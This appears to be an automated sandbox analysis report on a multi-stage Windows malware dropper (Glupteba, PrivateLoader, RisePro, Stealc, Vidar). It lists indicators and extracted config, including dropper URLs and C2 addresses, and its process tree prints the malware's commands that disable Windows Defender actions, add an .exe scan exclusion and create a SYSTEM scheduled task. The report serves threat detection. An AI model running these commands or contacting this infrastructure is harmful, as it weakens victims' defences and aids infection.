glupteba | 7ced2a74467a6c893720a90362b09991fea0eba0f682556fd15f08a9fd7a9ac9

Analysis

max time kernel
31s
max time network
64s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
02-05-2024 12:59

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

1714654664.9576216_setup.exe
Size

3.5MB
MD5

9c773ca35120d278e934beaa281ee353
SHA1

b9d6b488006eb05f85d790b12144309ab2d4be67
SHA256

7ced2a74467a6c893720a90362b09991fea0eba0f682556fd15f08a9fd7a9ac9
SHA512

9a33b36ca3215dbd2e37ad343bb627173f3985bc44162552354b5eec5f725fac0b1db985a7df2fef7fcf046f2b3b2e5473c377344470395e4f1284f4e2c6bebf
SSDEEP

98304:42b6HbvKrNUkWvjPJ6taLV18tRN8dru7C3mXWVwnw:42OHbSrikO12aX8twdeC3Vo

Score

10^/10

glupteba privateloader risepro stealc vidar 03cea2609023d13f145ac6c5dc897112 discovery dropper evasion execution loader spyware stealer themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=443

Extracted

Family

risepro

147.45.47.93:58709

Extracted

Family

stealc

http://185.172.128.151

rc4.plain

Extracted

Family

vidar

Version

9.3

Botnet

03cea2609023d13f145ac6c5dc897112

https://steamcommunity.com/profiles/76561199680449169

https://t.me/r1g1o

Attributes

profile_id_v2
03cea2609023d13f145ac6c5dc897112
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0

Signatures

Detect Vidar Stealer 4 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/4520-211-0x0000000000400000-0x0000000000643000-memory.dmp	family_vidar_v7
behavioral2/memory/2544-316-0x0000000000AD0000-0x0000000000B32953-memory.dmp	family_vidar_v7
behavioral2/memory/4520-213-0x0000000000400000-0x0000000000643000-memory.dmp	family_vidar_v7
behavioral2/memory/4520-200-0x0000000000400000-0x0000000000643000-memory.dmp	family_vidar_v7

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/8-436-0x0000000000400000-0x0000000001DF1000-memory.dmp	family_glupteba

Modifies firewall policy service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

1714654664.9576216_setup.exeWe8WDoTp14qjxDqiFqOfzC3w.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	1714654664.9576216_setup.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	We8WDoTp14qjxDqiFqOfzC3w.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

We8WDoTp14qjxDqiFqOfzC3w.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ We8WDoTp14qjxDqiFqOfzC3w.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	We8WDoTp14qjxDqiFqOfzC3w.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1780	powershell.exe
5928	powershell.exe
2236	powershell.exe
3932	powershell.exe
2172	powershell.exe
4160	powershell.exe
5480	powershell.exe
5324	powershell.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

We8WDoTp14qjxDqiFqOfzC3w.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	We8WDoTp14qjxDqiFqOfzC3w.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	We8WDoTp14qjxDqiFqOfzC3w.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

1714654664.9576216_setup.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation	1714654664.9576216_setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation	Install.exe

Executes dropped EXE 17 IoCs

Processes:

NgfBhc3KpT9g_06ueri8qoaZ.exey60XPvtMrJs58kwoRPu3Y5xf.exelysJzKFmqlL07rVDmx1Iketl.exeCiFpcyOnXOGYemn3ri8WhBQX.exeY7zf0Pc4bCTYqVWDQQuu6KNv.exeqqUYHz7hpiGnsYZ0pQXKX3S7.exeWe8WDoTp14qjxDqiFqOfzC3w.exe4zrKhJHoSFlQt9dU5SOizEot.exeoMrlDCTvmAxfECLAbEdfOWdI.exeSbQz1Z1_PlLLcuWevDUz5NO2.exe4QjVfZG6nJuiLXB4UdyNXwMr.exeKjJH5rfu3xQ3MaIyvqkCMEN3.exe4QjVfZG6nJuiLXB4UdyNXwMr.tmpInstall.exeauditorium.exeInstall.exeauditorium.exe

pid	process
1536	NgfBhc3KpT9g_06ueri8qoaZ.exe
2704	y60XPvtMrJs58kwoRPu3Y5xf.exe
3096	lysJzKFmqlL07rVDmx1Iketl.exe
3544	CiFpcyOnXOGYemn3ri8WhBQX.exe
8	Y7zf0Pc4bCTYqVWDQQuu6KNv.exe
1624	qqUYHz7hpiGnsYZ0pQXKX3S7.exe
552	We8WDoTp14qjxDqiFqOfzC3w.exe
2544	4zrKhJHoSFlQt9dU5SOizEot.exe
1980	oMrlDCTvmAxfECLAbEdfOWdI.exe
1396	SbQz1Z1_PlLLcuWevDUz5NO2.exe
752	4QjVfZG6nJuiLXB4UdyNXwMr.exe
3620	KjJH5rfu3xQ3MaIyvqkCMEN3.exe
4320	4QjVfZG6nJuiLXB4UdyNXwMr.tmp
2612	Install.exe
3804	auditorium.exe
4812	Install.exe
2264	auditorium.exe

Loads dropped DLL 4 IoCs

Processes:

qqUYHz7hpiGnsYZ0pQXKX3S7.exe4QjVfZG6nJuiLXB4UdyNXwMr.tmp

pid process

1624 qqUYHz7hpiGnsYZ0pQXKX3S7.exe
4320 4QjVfZG6nJuiLXB4UdyNXwMr.tmp
4320 4QjVfZG6nJuiLXB4UdyNXwMr.tmp
4320 4QjVfZG6nJuiLXB4UdyNXwMr.tmp
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
1624	qqUYHz7hpiGnsYZ0pQXKX3S7.exe
4320	4QjVfZG6nJuiLXB4UdyNXwMr.tmp
4320	4QjVfZG6nJuiLXB4UdyNXwMr.tmp
4320	4QjVfZG6nJuiLXB4UdyNXwMr.tmp

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Documents\SimpleAdobe\We8WDoTp14qjxDqiFqOfzC3w.exe	themida
behavioral2/memory/552-191-0x0000000000940000-0x0000000000F0B000-memory.dmp	themida
behavioral2/memory/552-210-0x0000000000940000-0x0000000000F0B000-memory.dmp	themida
behavioral2/memory/552-199-0x0000000000940000-0x0000000000F0B000-memory.dmp	themida
behavioral2/memory/552-198-0x0000000000940000-0x0000000000F0B000-memory.dmp	themida
behavioral2/memory/552-216-0x0000000000940000-0x0000000000F0B000-memory.dmp	themida
behavioral2/memory/552-214-0x0000000000940000-0x0000000000F0B000-memory.dmp	themida
behavioral2/memory/552-215-0x0000000000940000-0x0000000000F0B000-memory.dmp	themida
behavioral2/memory/552-209-0x0000000000940000-0x0000000000F0B000-memory.dmp	themida
behavioral2/memory/552-437-0x0000000000940000-0x0000000000F0B000-memory.dmp	themida

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

We8WDoTp14qjxDqiFqOfzC3w.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	We8WDoTp14qjxDqiFqOfzC3w.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

147 iplogger.org
148 iplogger.org
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

157 api.myip.com
161 ipinfo.io
4 api.myip.com
5 api.myip.com
8 ipinfo.io
9 ipinfo.io
155 api.myip.com

flow	ioc
147	iplogger.org
148	iplogger.org

flow	ioc
157	api.myip.com
161	ipinfo.io
4	api.myip.com
5	api.myip.com
8	ipinfo.io
9	ipinfo.io
155	api.myip.com

Drops file in System32 directory 8 IoCs

Processes:

We8WDoTp14qjxDqiFqOfzC3w.exe1714654664.9576216_setup.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy	We8WDoTp14qjxDqiFqOfzC3w.exe
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	We8WDoTp14qjxDqiFqOfzC3w.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	We8WDoTp14qjxDqiFqOfzC3w.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	We8WDoTp14qjxDqiFqOfzC3w.exe
File opened for modification	C:\Windows\System32\GroupPolicy	1714654664.9576216_setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	1714654664.9576216_setup.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	1714654664.9576216_setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	1714654664.9576216_setup.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

We8WDoTp14qjxDqiFqOfzC3w.exeKjJH5rfu3xQ3MaIyvqkCMEN3.exe

pid process

552 We8WDoTp14qjxDqiFqOfzC3w.exe
3620 KjJH5rfu3xQ3MaIyvqkCMEN3.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

4zrKhJHoSFlQt9dU5SOizEot.exe

description pid process target process

PID 2544 set thread context of 4520 2544 4zrKhJHoSFlQt9dU5SOizEot.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 2544 set thread context of 4520	2544	4zrKhJHoSFlQt9dU5SOizEot.exe	RegAsm.exe

Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4728	2544	WerFault.exe	4zrKhJHoSFlQt9dU5SOizEot.exe
5492	3544	WerFault.exe	CiFpcyOnXOGYemn3ri8WhBQX.exe
6108	4520	WerFault.exe	RegAsm.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

3192 schtasks.exe

pid	process
3192	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

We8WDoTp14qjxDqiFqOfzC3w.exelysJzKFmqlL07rVDmx1Iketl.exeSbQz1Z1_PlLLcuWevDUz5NO2.exe

pid	process
552	We8WDoTp14qjxDqiFqOfzC3w.exe
552	We8WDoTp14qjxDqiFqOfzC3w.exe
3096	lysJzKFmqlL07rVDmx1Iketl.exe
3096	lysJzKFmqlL07rVDmx1Iketl.exe
1396	SbQz1Z1_PlLLcuWevDUz5NO2.exe
1396	SbQz1Z1_PlLLcuWevDUz5NO2.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

KjJH5rfu3xQ3MaIyvqkCMEN3.exe

pid process

3620 KjJH5rfu3xQ3MaIyvqkCMEN3.exe

pid	process
3620	KjJH5rfu3xQ3MaIyvqkCMEN3.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1714654664.9576216_setup.exe4zrKhJHoSFlQt9dU5SOizEot.exe4QjVfZG6nJuiLXB4UdyNXwMr.exeNgfBhc3KpT9g_06ueri8qoaZ.exe4QjVfZG6nJuiLXB4UdyNXwMr.tmpInstall.exeInstall.exe

description	pid	process	target process
PID 3864 wrote to memory of 2704	3864	1714654664.9576216_setup.exe	y60XPvtMrJs58kwoRPu3Y5xf.exe
PID 3864 wrote to memory of 2704	3864	1714654664.9576216_setup.exe	y60XPvtMrJs58kwoRPu3Y5xf.exe
PID 3864 wrote to memory of 1536	3864	1714654664.9576216_setup.exe	NgfBhc3KpT9g_06ueri8qoaZ.exe
PID 3864 wrote to memory of 1536	3864	1714654664.9576216_setup.exe	NgfBhc3KpT9g_06ueri8qoaZ.exe
PID 3864 wrote to memory of 1536	3864	1714654664.9576216_setup.exe	NgfBhc3KpT9g_06ueri8qoaZ.exe
PID 3864 wrote to memory of 3096	3864	1714654664.9576216_setup.exe	lysJzKFmqlL07rVDmx1Iketl.exe
PID 3864 wrote to memory of 3096	3864	1714654664.9576216_setup.exe	lysJzKFmqlL07rVDmx1Iketl.exe
PID 3864 wrote to memory of 3096	3864	1714654664.9576216_setup.exe	lysJzKFmqlL07rVDmx1Iketl.exe
PID 3864 wrote to memory of 3544	3864	1714654664.9576216_setup.exe	CiFpcyOnXOGYemn3ri8WhBQX.exe
PID 3864 wrote to memory of 3544	3864	1714654664.9576216_setup.exe	CiFpcyOnXOGYemn3ri8WhBQX.exe
PID 3864 wrote to memory of 3544	3864	1714654664.9576216_setup.exe	CiFpcyOnXOGYemn3ri8WhBQX.exe
PID 3864 wrote to memory of 8	3864	1714654664.9576216_setup.exe	Y7zf0Pc4bCTYqVWDQQuu6KNv.exe
PID 3864 wrote to memory of 8	3864	1714654664.9576216_setup.exe	Y7zf0Pc4bCTYqVWDQQuu6KNv.exe
PID 3864 wrote to memory of 8	3864	1714654664.9576216_setup.exe	Y7zf0Pc4bCTYqVWDQQuu6KNv.exe
PID 3864 wrote to memory of 1624	3864	1714654664.9576216_setup.exe	qqUYHz7hpiGnsYZ0pQXKX3S7.exe
PID 3864 wrote to memory of 1624	3864	1714654664.9576216_setup.exe	qqUYHz7hpiGnsYZ0pQXKX3S7.exe
PID 3864 wrote to memory of 1624	3864	1714654664.9576216_setup.exe	qqUYHz7hpiGnsYZ0pQXKX3S7.exe
PID 3864 wrote to memory of 552	3864	1714654664.9576216_setup.exe	We8WDoTp14qjxDqiFqOfzC3w.exe
PID 3864 wrote to memory of 552	3864	1714654664.9576216_setup.exe	We8WDoTp14qjxDqiFqOfzC3w.exe
PID 3864 wrote to memory of 552	3864	1714654664.9576216_setup.exe	We8WDoTp14qjxDqiFqOfzC3w.exe
PID 3864 wrote to memory of 3620	3864	1714654664.9576216_setup.exe	KjJH5rfu3xQ3MaIyvqkCMEN3.exe
PID 3864 wrote to memory of 3620	3864	1714654664.9576216_setup.exe	KjJH5rfu3xQ3MaIyvqkCMEN3.exe
PID 3864 wrote to memory of 3620	3864	1714654664.9576216_setup.exe	KjJH5rfu3xQ3MaIyvqkCMEN3.exe
PID 3864 wrote to memory of 2544	3864	1714654664.9576216_setup.exe	4zrKhJHoSFlQt9dU5SOizEot.exe
PID 3864 wrote to memory of 2544	3864	1714654664.9576216_setup.exe	4zrKhJHoSFlQt9dU5SOizEot.exe
PID 3864 wrote to memory of 2544	3864	1714654664.9576216_setup.exe	4zrKhJHoSFlQt9dU5SOizEot.exe
PID 3864 wrote to memory of 1980	3864	1714654664.9576216_setup.exe	oMrlDCTvmAxfECLAbEdfOWdI.exe
PID 3864 wrote to memory of 1980	3864	1714654664.9576216_setup.exe	oMrlDCTvmAxfECLAbEdfOWdI.exe
PID 3864 wrote to memory of 1980	3864	1714654664.9576216_setup.exe	oMrlDCTvmAxfECLAbEdfOWdI.exe
PID 3864 wrote to memory of 1396	3864	1714654664.9576216_setup.exe	SbQz1Z1_PlLLcuWevDUz5NO2.exe
PID 3864 wrote to memory of 1396	3864	1714654664.9576216_setup.exe	SbQz1Z1_PlLLcuWevDUz5NO2.exe
PID 3864 wrote to memory of 1396	3864	1714654664.9576216_setup.exe	SbQz1Z1_PlLLcuWevDUz5NO2.exe
PID 3864 wrote to memory of 752	3864	1714654664.9576216_setup.exe	4QjVfZG6nJuiLXB4UdyNXwMr.exe
PID 3864 wrote to memory of 752	3864	1714654664.9576216_setup.exe	4QjVfZG6nJuiLXB4UdyNXwMr.exe
PID 3864 wrote to memory of 752	3864	1714654664.9576216_setup.exe	4QjVfZG6nJuiLXB4UdyNXwMr.exe
PID 2544 wrote to memory of 4828	2544	4zrKhJHoSFlQt9dU5SOizEot.exe	Conhost.exe
PID 2544 wrote to memory of 4828	2544	4zrKhJHoSFlQt9dU5SOizEot.exe	Conhost.exe
PID 2544 wrote to memory of 4828	2544	4zrKhJHoSFlQt9dU5SOizEot.exe	Conhost.exe
PID 2544 wrote to memory of 4520	2544	4zrKhJHoSFlQt9dU5SOizEot.exe	RegAsm.exe
PID 2544 wrote to memory of 4520	2544	4zrKhJHoSFlQt9dU5SOizEot.exe	RegAsm.exe
PID 2544 wrote to memory of 4520	2544	4zrKhJHoSFlQt9dU5SOizEot.exe	RegAsm.exe
PID 752 wrote to memory of 4320	752	4QjVfZG6nJuiLXB4UdyNXwMr.exe	4QjVfZG6nJuiLXB4UdyNXwMr.tmp
PID 752 wrote to memory of 4320	752	4QjVfZG6nJuiLXB4UdyNXwMr.exe	4QjVfZG6nJuiLXB4UdyNXwMr.tmp
PID 752 wrote to memory of 4320	752	4QjVfZG6nJuiLXB4UdyNXwMr.exe	4QjVfZG6nJuiLXB4UdyNXwMr.tmp
PID 2544 wrote to memory of 4520	2544	4zrKhJHoSFlQt9dU5SOizEot.exe	RegAsm.exe
PID 2544 wrote to memory of 4520	2544	4zrKhJHoSFlQt9dU5SOizEot.exe	RegAsm.exe
PID 2544 wrote to memory of 4520	2544	4zrKhJHoSFlQt9dU5SOizEot.exe	RegAsm.exe
PID 2544 wrote to memory of 4520	2544	4zrKhJHoSFlQt9dU5SOizEot.exe	RegAsm.exe
PID 2544 wrote to memory of 4520	2544	4zrKhJHoSFlQt9dU5SOizEot.exe	RegAsm.exe
PID 2544 wrote to memory of 4520	2544	4zrKhJHoSFlQt9dU5SOizEot.exe	RegAsm.exe
PID 1536 wrote to memory of 2612	1536	NgfBhc3KpT9g_06ueri8qoaZ.exe	Install.exe
PID 1536 wrote to memory of 2612	1536	NgfBhc3KpT9g_06ueri8qoaZ.exe	Install.exe
PID 1536 wrote to memory of 2612	1536	NgfBhc3KpT9g_06ueri8qoaZ.exe	Install.exe
PID 4320 wrote to memory of 3804	4320	4QjVfZG6nJuiLXB4UdyNXwMr.tmp	auditorium.exe
PID 4320 wrote to memory of 3804	4320	4QjVfZG6nJuiLXB4UdyNXwMr.tmp	auditorium.exe
PID 4320 wrote to memory of 3804	4320	4QjVfZG6nJuiLXB4UdyNXwMr.tmp	auditorium.exe
PID 2612 wrote to memory of 4812	2612	Install.exe	Install.exe
PID 2612 wrote to memory of 4812	2612	Install.exe	Install.exe
PID 2612 wrote to memory of 4812	2612	Install.exe	Install.exe
PID 4320 wrote to memory of 2264	4320	4QjVfZG6nJuiLXB4UdyNXwMr.tmp	auditorium.exe
PID 4320 wrote to memory of 2264	4320	4QjVfZG6nJuiLXB4UdyNXwMr.tmp	auditorium.exe
PID 4320 wrote to memory of 2264	4320	4QjVfZG6nJuiLXB4UdyNXwMr.tmp	auditorium.exe
PID 4812 wrote to memory of 864	4812	Install.exe	cmd.exe
PID 4812 wrote to memory of 864	4812	Install.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\1714654664.9576216_setup.exe
"C:\Users\Admin\AppData\Local\Temp\1714654664.9576216_setup.exe"
1⤵
- Modifies firewall policy service
- Checks computer location settings
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3864

C:\Users\Admin\Documents\SimpleAdobe\y60XPvtMrJs58kwoRPu3Y5xf.exe
C:\Users\Admin\Documents\SimpleAdobe\y60XPvtMrJs58kwoRPu3Y5xf.exe
2⤵
- Executes dropped EXE
PID:2704

C:\Users\Admin\Documents\SimpleAdobe\NgfBhc3KpT9g_06ueri8qoaZ.exe
C:\Users\Admin\Documents\SimpleAdobe\NgfBhc3KpT9g_06ueri8qoaZ.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1536

C:\Users\Admin\AppData\Local\Temp\7zS9D59.tmp\Install.exe
.\Install.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2612

C:\Users\Admin\AppData\Local\Temp\7zSA76B.tmp\Install.exe
.\Install.exe /MQBoBdidEJ "525403" /S
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4812

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
5⤵
PID:864

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
6⤵
PID:1444

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
7⤵
PID:1060

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
8⤵
PID:3240

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
6⤵
PID:4484

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
7⤵
PID:1052

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
8⤵
PID:1252

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
6⤵
PID:216

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
7⤵
PID:3976

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
8⤵
PID:3940

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
6⤵
PID:3640

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
7⤵
PID:3168

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
8⤵
PID:3396

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
6⤵
PID:3492

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
7⤵
PID:3604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
8⤵
- Command and Scripting Interpreter: PowerShell
PID:2236

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
9⤵
PID:3400

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
5⤵
PID:1060

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
PID:4376

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Command and Scripting Interpreter: PowerShell
PID:1780

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:1092

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bQHCJPEnwlruqTafSb" /SC once /ST 13:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSA76B.tmp\Install.exe\" eW /JMwdidHemw 525403 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:3192

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bQHCJPEnwlruqTafSb"
5⤵
PID:2580

C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bQHCJPEnwlruqTafSb
6⤵
PID:3604

\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bQHCJPEnwlruqTafSb
7⤵
PID:4004

C:\Users\Admin\Documents\SimpleAdobe\lysJzKFmqlL07rVDmx1Iketl.exe
C:\Users\Admin\Documents\SimpleAdobe\lysJzKFmqlL07rVDmx1Iketl.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3096

C:\Users\Admin\Documents\SimpleAdobe\4QjVfZG6nJuiLXB4UdyNXwMr.exe
C:\Users\Admin\Documents\SimpleAdobe\4QjVfZG6nJuiLXB4UdyNXwMr.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:752

C:\Users\Admin\AppData\Local\Temp\is-7KE64.tmp\4QjVfZG6nJuiLXB4UdyNXwMr.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7KE64.tmp\4QjVfZG6nJuiLXB4UdyNXwMr.tmp" /SL5="$B00DE,5241960,54272,C:\Users\Admin\Documents\SimpleAdobe\4QjVfZG6nJuiLXB4UdyNXwMr.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4320

C:\Users\Admin\AppData\Local\Auditorium\auditorium.exe
"C:\Users\Admin\AppData\Local\Auditorium\auditorium.exe" -i
4⤵
- Executes dropped EXE
PID:3804

C:\Users\Admin\AppData\Local\Auditorium\auditorium.exe
"C:\Users\Admin\AppData\Local\Auditorium\auditorium.exe" -s
4⤵
- Executes dropped EXE
PID:2264

